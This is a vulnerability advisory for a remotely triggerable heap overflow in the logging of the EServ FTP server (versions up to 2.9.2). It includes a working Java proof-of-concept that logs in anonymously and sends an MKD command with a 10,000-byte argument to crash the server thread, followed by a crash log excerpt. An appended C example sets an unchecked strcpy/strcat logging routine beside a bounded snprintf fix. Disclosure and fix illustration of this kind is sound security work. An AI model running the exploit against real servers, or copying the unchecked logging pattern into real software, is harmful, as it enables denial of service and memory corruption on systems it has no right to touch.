Vulnerability: Eserv

Affected: Eserv

Description

The following is based on MDMA Advisory #6 by Andrew Lewis aka. Wizdumb. EServ has problems handling long strings in its logging, which gives it a remotely exploitable heap overflow. The following code demonstrates the vulnerability...

/* Proof of concept code for the heap overflow in EServ <= 2.9.2
 * Written 10/05/2000 by Andrew Lewis aka. Wizdumb [MDMA] */

import java.io.*;
import java.net.*;

class eservheap {
    public static void main(String[] args) throws IOException {
        if (args.length < 1) {
            System.out.println("Syntax: java eservheap [host] <user> <pass>");
            System.exit(1);
        }

        Socket soq = null;
        PrintWriter white = null;
        BufferedReader weed = null;

        try {
            soq = new Socket(args[0], 21);
            white = new PrintWriter(soq.getOutputStream(), true);
            weed = new BufferedReader(new InputStreamReader(soq.getInputStream()));
        } catch (Exception e) {
            System.out.println("Problems connecting :-/");
            System.exit(1);
        }

        weed.readLine();    // server banner

        // log in with the supplied credentials, or anonymously if none were given
        String juzer = (args.length == 3) ? ("USER " + args[1]) : "USER anonymous";
        String pasz = (args.length == 3) ? ("PASS " + args[2]) : "PASS mdma";
        white.println(juzer + "\n" + pasz);
        weed.readLine();
        weed.readLine();

        // MKD with a 10000-byte argument: the server logs it and overflows
        white.print("MKD ");
        for (int i = 0; i < 10000; i++)
            white.print("A");
        white.println();    // uNf! Who yoh daddy, bitch?
        weed.readLine();
        white.println("QUIT");
    }
}

And no, you don't need write access to the directory for that to work -- like said before. The heap overflow occurs in the logging. The following extract from e.log shows the effect of this code...

27.05.2000 17:02:19 Eserv/2.92 2986 1 EXCEPTION! CODE:C0000005 ADDRESS:49247E WORD:C!
REGISTERS:
1C5EC6C 50 62 34 00 36 5D 4E 00 FF 5F 34 00 0C 27 00 00 Pb4.6]N.Ñ_4..'..
1C5EC7C E8 FD 00 00 41 00 00 00 48 FF C5 01 7E 24 49 00 ÉÜ..A...HÑå.~$I.
1C5EC8C 1B 00 00 00 46 02 01 00 9C EE C5 01 23 00 00 00 .....F..._Ïå.#...
/* I.e. Thread crashes on MKD, but has no effect on other threads */
USER DATA: 346250
HANDLER: 1C5EED0
RETURN STACK:
1C5EE9C : 498BB9 C!
1C5EEA0 : 4C2AF0 HOLD
1C5EEA4 : 4CAC34 HOLDS /* these HOLDS are buggy - no length checking */
1C5EEA8 : 7FFFE6FC <not in the image>
1C5EEAC : 7FFFD8F4 <not in the image>
1C5EEB0 : 4CAC49 HOLDS
1C5EEB4 : 4E5E12 MKD
1C5EEB8 : 49B279 |DROP
1C5EEBC : 2 <not found>
1C5EEC0 : 339DE8 <not found>
1C5EEC4 : 270C <not found>
1C5EEC8 : 4C42C1 INTERPRET
1C5EECC : 4C303F NEW_CATCH
1C5EED0 : 1C5EF14 <not in the image>

It may also be worth noting that EServ has the /con/con vulnerability and that older versions shipped with a vulnerable version of Ultimate Bulletin Board.

Solution

Nothing yet.
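As an added illustration of the bug class the advisory describes (a command argument copied into a fixed-size log record with no length check, as the "no length checking" note on the HOLDS frames suggests), here is that pattern beside the bounded form that would close it. This is constructed code, not EServ's; the record size, field layout and function names are assumptions.

```c
/* Constructed illustration of the bug class in this advisory, not EServ's
 * code: record size, field layout and function names are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define LOG_RECORD_SIZE 256   /* assumed size of one heap-allocated log record */

/* Vulnerable pattern: the argument is copied into a fixed-size heap record with
 * no bound, so a 10000-byte MKD argument runs past the allocation (the EXCEPTION
 * in e.log above). Only called with a short argument in main below. */
char *log_command_unchecked(const char *cmd, const char *arg)
{
    char *rec = malloc(LOG_RECORD_SIZE);
    if (rec == NULL) return NULL;
    strcpy(rec, cmd);          /* no bound */
    strcat(rec, " ");
    strcat(rec, arg);          /* overflows when strlen(arg) is large */
    return rec;
}

/* Bounded pattern: snprintf never writes past the record; an over-long
 * argument is truncated and the truncation is marked for the analyst. */
char *log_command_bounded(const char *cmd, const char *arg)
{
    char *rec = malloc(LOG_RECORD_SIZE);
    if (rec == NULL) return NULL;
    int n = snprintf(rec, LOG_RECORD_SIZE, "%s %s", cmd, arg);
    if (n < 0) { free(rec); return NULL; }
    if (n >= LOG_RECORD_SIZE)  /* output did not fit: flag it */
        memcpy(rec + LOG_RECORD_SIZE - 4, "...", 4);
    return rec;
}

/* Builds the advisory's input: an argument of len 'A' bytes. */
char *make_long_arg(size_t len)
{
    char *s = malloc(len + 1);
    if (s == NULL) return NULL;
    memset(s, 'A', len);
    s[len] = '\0';
    return s;
}

int main(void)
{
    char *arg = make_long_arg(10000);
    char *rec = log_command_bounded("MKD", arg);  /* the unchecked one would overflow here */
    printf("%zu bytes logged: %.12s ... %s\n", strlen(rec), rec, rec + strlen(rec) - 3);
    free(rec); free(arg);
    return 0;
}
```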